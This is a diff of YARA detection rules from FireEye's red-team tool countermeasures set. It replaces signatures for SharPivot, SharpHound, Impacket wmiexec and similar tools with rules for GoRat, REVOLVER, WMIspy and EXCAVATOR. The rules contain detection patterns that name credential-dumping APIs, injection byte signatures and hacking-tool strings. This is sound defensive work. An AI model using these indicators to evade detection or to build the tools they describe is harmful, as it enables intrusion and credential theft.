-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_3.yar#L4-L31"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Plugin_DOTNET_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "ecf13e47e409efd68b508735a84be6a1627f5b0c0cea6b90434fc9ba5b1d8cf5"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "e979822273c6d1ccdfebd341c9e2cb1040fe34a04e8b41c024885063fd946ad5"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "SharPivot" ascii wide
-		$str2 = "ParseArgs" ascii wide
-		$str3 = "GenRandomString" ascii wide
-		$str4 = "ScheduledTaskExists" ascii wide
-		$str5 = "ServiceExists" ascii wide
-		$str6 = "lpPassword" ascii wide
-		$str7 = "execute" ascii wide
-		$str8 = "WinRM" ascii wide
-		$str9 = "SchtaskMod" ascii wide
-		$str10 = "PoisonHandler" ascii wide
-		$str11 = "SCShell" ascii wide
-		$str12 = "SchtaskMod" ascii wide
-		$str13 = "ServiceHijack" ascii wide
-		$str14 = "commandArg" ascii wide
-		$str15 = "payloadPath" ascii wide
-		$str16 = "Schtask" ascii wide
+		$typelibguid0 = "cd9407d0-fc8d-41ed-832d-da94daa3e064" ascii nocase wide
+		$typelibguid1 = "fc3daedf-1d01-4490-8032-b978079d8c2d" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_4 : FILE
+rule FIREEYE_RT_Trojan_Macro_RESUMEPLEASE_1
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPivot project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "c1bd64da-6a54-5bc6-8a89-9c8a93dd965c"
-		date = "2020-12-09"
+		id = "068662f6-28b8-5538-8bc3-6506565305ae"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_4.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RESUMEPLEASE/production/yara/Trojan_Macro_RESUMEPLEASE_1.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "7ef883148926d5786861e5e81b1e645aa2e3ca06bd663f2b5f32e04b5852a218"
+		hash = "d5d3d23c8573d999f1c48d3e211b1066"
+		logic_hash = "040457bc446e496431129ff4623ddda5d9c2ce339ba65a7fbe42114626f36c60"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		rev = 3
+		quality = 75
+		tags = ""
+		rev = 1
 
 	strings:
-		$typelibguid1 = "44B83A69-349F-4A3E-8328-A45132A70D62" ascii nocase wide
+		$str00 = "For Binary As"
+		$str01 = "Range.Text"
+		$str02 = "Environ("
+		$str03 = "CByte("
+		$str04 = ".SpawnInstance_"
+		$str05 = ".Create("
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_WMISPY_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "wql searches"
 		author = "FireEye"
-		id = "c2834bd6-efb0-5dac-adcd-a9450090fc28"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "474af878-a657-54bc-a063-04532df928d4"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/APT_HackTool_MSIL_WMISPY_2.yar#L4-L24"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "1c71b9641e30c9764f3503e49f8f85472d7e62384c8dd2b420c4fa2b2fccda4f"
+		hash = "3651f252d53d2f46040652788499d65a"
+		logic_hash = "553fc1e536482a56b3228a5c9ebac843af9083e8ac864bf65c81b36a39ca5e5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 4
 
 	strings:
-		$s2 = { 73 ?? 00 00 0A 0A 06 1F ?? 1F ?? 6F ?? 00 00 0A 0B 73 ?? 00 00 0A 0C 16 13 04 2B 5E 23 [8] 06 6F ?? 00 00 0A 5A 23 [8] 58 28 ?? 00 00 0A 28 ?? 00 00 0A 28 ?? 00 00 0A }
-		$s3 = "cmd_rpc" wide
-		$s4 = "costura"
+		$MSIL = "_CorExeMain"
+		$str1 = "root\\cimv2" wide
+		$str2 = "root\\standardcimv2" wide
+		$str3 = "from MSFT_NetNeighbor" wide
+		$str4 = "from Win32_NetworkLoginProfile" wide
+		$str5 = "from Win32_IP4RouteTable" wide
+		$str6 = "from Win32_DCOMApplication" wide
+		$str7 = "from Win32_SystemDriver" wide
+		$str8 = "from Win32_Share" wide
+		$str9 = "from Win32_Process" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and $MSIL and all of ( $str* )
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_2 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Wmispy_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIspy' project."
 		author = "FireEye"
-		id = "8d6d28ce-de3a-5a38-b654-ba1372d47568"
+		id = "ac394751-da40-564b-8e24-8f353326b46a"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_2.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/HackTool_MSIL_WMIspy_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "14e4a29a32e8441a6f7f322e09cd9bb9822ae47eaa1fdf8e09c90998b03658f5"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "a5a9f7c7a7bfe474e8b21306ea220b4d476832f3ad4fafdd8967a2250d15a701"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$s1 = "costura"
-		$s2 = "cmd_schtask" wide
-		$s3 = "cmd_wmi" wide
-		$s4 = "cmd_rpc" wide
-		$s5 = "GoogleUpdateTaskMachineUA" wide
-		$s6 = "servicehijack" wide
-		$s7 = "poisonhandler" wide
+		$typelibguid0 = "5ee2bca3-01ad-489b-ab1b-bda7962e06bb" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharphound_3 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_REVOLVER_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'revolver' project."
 		author = "FireEye"
-		id = "456b3208-1e8d-5eb7-81ee-39f1c886c5a7"
+		id = "8fa5adb7-dc66-51bc-9f60-2308515f33a8"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_SharpHound_3.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_HackTool_MSIL_REVOLVER_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "eeedc09570324767a3de8205f66a5295"
-		logic_hash = "baeea6cae42c755ee389378229b2b206c82f60f75a5ce5f9cfa06871fc9507d1"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "8df8a56ed55b7857adb95daa643d544a49eb5f1952b4ad3ef757c34dad2ce317"
 		score = 75
-		quality = 73
+		quality = 71
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$typelibguid1 = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii nocase wide
+		$typelibguid0 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide
+		$typelibguid1 = "b214d962-7595-440b-abef-f83ecdb999d2" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Puppyhound_1 : FILE
+rule FIREEYE_RT_FE_APT_Loader_MSIL_REVOLVER_1 : FILE
 {
 	meta:
-		description = "This is a modification of an existing FireEye detection for SharpHound. However, it looks for the string 'PuppyHound' instead of 'SharpHound' as this is all that was needed to detect the PuppyHound variant of SharpHound."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1155f959-c8bc-597a-8a80-abee8d95b6ec"
-		date = "2020-12-09"
-		modified = "2020-12-09"
+		id = "d99620e0-39ed-58db-acce-0d885a9e0bf7"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_PuppyHound_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_Loader_MSIL_REVOLVER_1.yar#L5-L14"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "eeedc09570324767a3de8205f66a5295"
-		logic_hash = "39073bbfef15ecd28c1772e5d01e54c3d5774ecb4c90f0076bda5dc400abacba"
+		logic_hash = "1231f4c961dec122ebcb142052c2c7c03acf9b556cdb71a3efabde6bcf50a939"
 		score = 75
 		quality = 50
 		tags = "FILE"
-		rev = 6
 
 	strings:
-		$1 = "PuppyHound"
-		$2 = "UserDomainKey"
-		$3 = "LdapBuilder"
-		$init = { 28 [2] 00 0A 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 28 [2] 00 0A 0B 1F 2D }
-		$msil = /\x00_Cor(Exe|Dll)Main\x00/
+		$inject = { 28 [2] 00 06 0? 0? 7B [2] 00 04 7E [2] 00 0A 28 [2] 00 0A [2-40] 7E [2] 00 0A 0? 20 00 10 00 00 28 [2] 00 0A 0? 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? ?? 20 00 30 00 00 1F 40 28 [2] 00 06 [2-40] 28 [2] 00 0A 1? 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 1? ?? FE 15 [2] 00 02 1? ?? 72 [2] 00 70 28 [2] 00 06 1? ?? FE 15 [2] 00 02 1? ?? 1? ?? 1? 28 [2] 00 06 2? 7E [2] 00 0A 1? ?? 0? 7B [2] 00 04 1? ?? 1? 1? ?? 28 [2] 00 06 2? ?? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-10] 7E [2] 00 0A 1? ?? 1? ?? 20 [2] 1F 00 7E [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? 1? 20 [2] 00 00 20 [2] 00 00 7E [2] 00 0A 28 [2] 00 06 2? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-40] 1? ?? 0? 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 2? ?? 2? 1? 1? ?? 1? ?? 1? ?? 28 [2] 00 06 }
+		$iz1 = /_Cor(Exe|Dll)Main/ fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_SHARPZEROLOGON_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Allthethings_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'sharpzerologon' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'AllTheThings' project."
 		author = "FireEye"
-		id = "51f22eee-fb96-55b0-8c02-1a0e9910a93e"
+		id = "1805b406-2531-56bf-8e08-e63a59ffcc84"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPZEROLOGON/production/yara/HackTool_MSIL_SHARPZEROLOGON_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ALLTHETHINGS/production/yara/Loader_MSIL_AllTheThings_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "ed6a9bef5c6ee03aff969b8765b284ace517f2e6a1ef114acb04cf094c69cfa5"
+		logic_hash = "e3058095f2a49f8c0f78cb392024795367609b04c1da80210ab8d72c6613ee71"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 2
 
 	strings:
-		$typelibguid0 = "15ce9a3c-4609-4184-87b2-e29fc5e2b770" ascii nocase wide
+		$typelibguid0 = "542ccc64-c4c3-4c03-abcd-199a11b26754" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_2
+rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_2 : FILE
 {
 	meta:
-		description = "wmiexec"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "f1059f66-eaff-5866-bafb-c94236cf96a0"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "4b7640e8-5621-5cc3-8ac9-84347f23f5eb"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Wmiexec)/production/yara/HackTool_PY_ImpacketObfuscation_2.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f3dd8aa567a01098a8a610529d892485"
-		logic_hash = "ccbbe507798f16c7acf0780770fdb81b2e7dc333ab8bc51e6216816276c3f14b"
+		hash = "4fd62068e591cbd6f413e1c2b8f75442"
+		logic_hash = "14263c17323cd78df10f7f101bd7a9c74f7818b34a2e42125d45205067399381"
 		score = 75
-		quality = 50
-		tags = ""
-		rev = 2
+		quality = 75
+		tags = "FILE"
+		rev = 1
 
 	strings:
-		$s1 = "import random"
-		$s2 = "class WMIEXEC" nocase
-		$s3 = "class RemoteShell" nocase
-		$s4 = /=[\x09\x20]{0,32}str\(int\(time\.time\(\)\)[\x09\x20]{0,32}-[\x09\x20]{0,32}random\.randint\(\d{1,10}[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,10}\)\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}str\(uuid\.uuid4\(\)\)\.split\([\x22\x27]\-[\x22\x27]\)\[0\]/
-		$s5 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]cmd.exe[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase
+		$api1 = "PssCaptureSnapshot" fullword
+		$api2 = "MiniDumpWriteDump" fullword
+		$dump = { C7 [2-5] FD 03 00 AC 4C 8D 4D ?? 41 B8 1F 00 10 00 8B [2-5] 48 8B 4D ?? E8 [4] 89 [2-5] 83 [2-5] 00 74 ?? 48 8B 4D ?? FF 15 [4] 33 C0 E9 [4] 41 B8 10 00 00 00 33 D2 48 8D 8D [4] E8 [4] 48 8D 05 [4] 48 89 85 [4] 48 C7 85 [8] 48 C7 44 24 30 00 00 00 00 C7 44 24 28 80 00 00 00 C7 44 24 20 01 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4] 48 89 85 [4] 48 83 BD [4] FF 75 ?? 48 8B 4D ?? FF 15 [4] 33 C0 EB [0-17] 48 8D [5] 48 89 ?? 24 30 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 41 B9 02 00 00 00 4C 8B 85 [4] 8B [1-5] 48 8B 4D ?? E8 }
+		$enable_dbg_pri = { 4C 8D 45 ?? 48 8D 15 [4] 33 C9 FF 15 [4] 85 C0 0F 84 [4] C7 45 ?? 01 00 00 00 B8 0C 00 00 00 48 6B C0 00 48 8B 4D ?? 48 89 4C 05 ?? B8 0C 00 00 00 48 6B C0 00 C7 44 05 ?? 02 00 00 00 FF 15 [4] 4C 8D 45 ?? BA 20 00 00 00 48 8B C8 FF 15 [4] 85 C0 74 ?? 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 45 ?? 33 D2 48 8B 4D ?? FF 15 }
 
 	condition:
-		all of them
+		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_JUSTASK_1 : FILE
+rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'justask' project."
+		description = "This rule looks for the binary signature of the 'Inject' method found in the main Excavator PE."
 		author = "FireEye"
-		id = "06a03d82-db69-5b5a-a578-a8053814e917"
+		id = "7cabc230-e55b-5096-996a-b6a8c9693bdc"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/JUSTASK/production/yara/APT_HackTool_MSIL_JUSTASK_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "24d2f8e3838c4f02cd80644a396ce7cf105761d2feba54e39973564ca5e97571"
+		hash = "f7d9961463b5110a3d70ee2e97842ed3"
+		logic_hash = "bf4b776f34a1a9aa5438504f63a63ef452a747363de3b70cec52145d777055bd"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$typelibguid0 = "aa59be52-7845-4fed-9ea5-1ea49085d67a" ascii nocase wide
+		$bytes1 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 20 01 00 00 48 8B 05 75 BF 01 00 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 8D 0D 12 A1 01 00 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 00 FF 15 CB 1F 01 00 48 85 C0 75 1B FF 15 80 1F 01 00 8B D0 48 8D 0D DF A0 01 00 E8 1A FF FF FF 33 C0 E9 B4 02 00 00 48 8D 15 D4 A0 01 00 48 89 9C 24 30 01 00 00 48 8B C8 FF 15 4B 1F 01 00 48 8B D8 48 85 C0 75 19 FF 15 45 1F 01 00 8B D0 48 8D 0D A4 A0 01 00 E8 DF FE FF FF E9 71 02 00 00 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 45 66 66 0F 1F 84 00 00 00 00 00 48 8B 4C 24 60 FF 15 4D 1F 01 00 3B C6 74 22 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 D1 EB 0A 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A0 01 00 48 8D 05 A6 C8 01 00 B9 C8 05 00 00 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 B2 FF 15 CC 1E 01 00 4C 8D 44 24 78 BA 0A 00 00 00 48 8B C8 FF 15 01 1E 01 00 85 C0 0F 84 66 01 00 00 48 8B 4C 24 78 48 8D 45 80 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 D8 1D 01 00 85 C0 0F 84 35 01 00 00 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 50 01 FF 15 5C 1E 01 00 FF 15 06 1E 01 00 4C 8B 44 24 68 33 D2 48 8B C8 FF 15 DE 1D 01 00 48 8B F8 48 85 C0 0F 84 FF 00 00 00 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 50 01 FF 15 25 1E 01 00 85 C0 0F 84 E2 00 00 00 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 6C 1D 01 00 85 C0 0F 84 B1 00 00 00 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C 8D 05 58 39 03 00 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 44 24 30 04 00 08 00 44 89 74 24 28 4C 89 74 24 20 FF 15 0C 1D 01 00 85 C0 74 65 48 8B 4C 24 70 8B 5D 98 FF 15 1A 1D 01 00 48 8B 4D 88 FF 15 10 1D 01 00 48 8B 4D 90 FF 15 06 1D 01 00 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 4E 1D 01 00 48 8B D8 48 85 C0 74 2B 48 8B C8 E8 4E 06 00 00 48 85 C0 74 1E BA FF FF FF FF 48 8B C8 FF 15 3B 1D 01 00 48 8B CB FF 15 CA 1C 01 00 B8 01 00 00 00 EB 24 FF 15 DD 1C 01 00 8B D0 48 8D 0D 58 9E 01 00 E8 77 FC FF FF 48 85 FF 74 09 48 8B CF FF 15 A9 1C 01 00 33 C0 48 8B 9C 24 30 01 00 00 48 8B 4D 10 48 33 CC E8 03 07 00 00 4C 8D 9C 24 20 01 00 00 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
+		$bytes2 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A 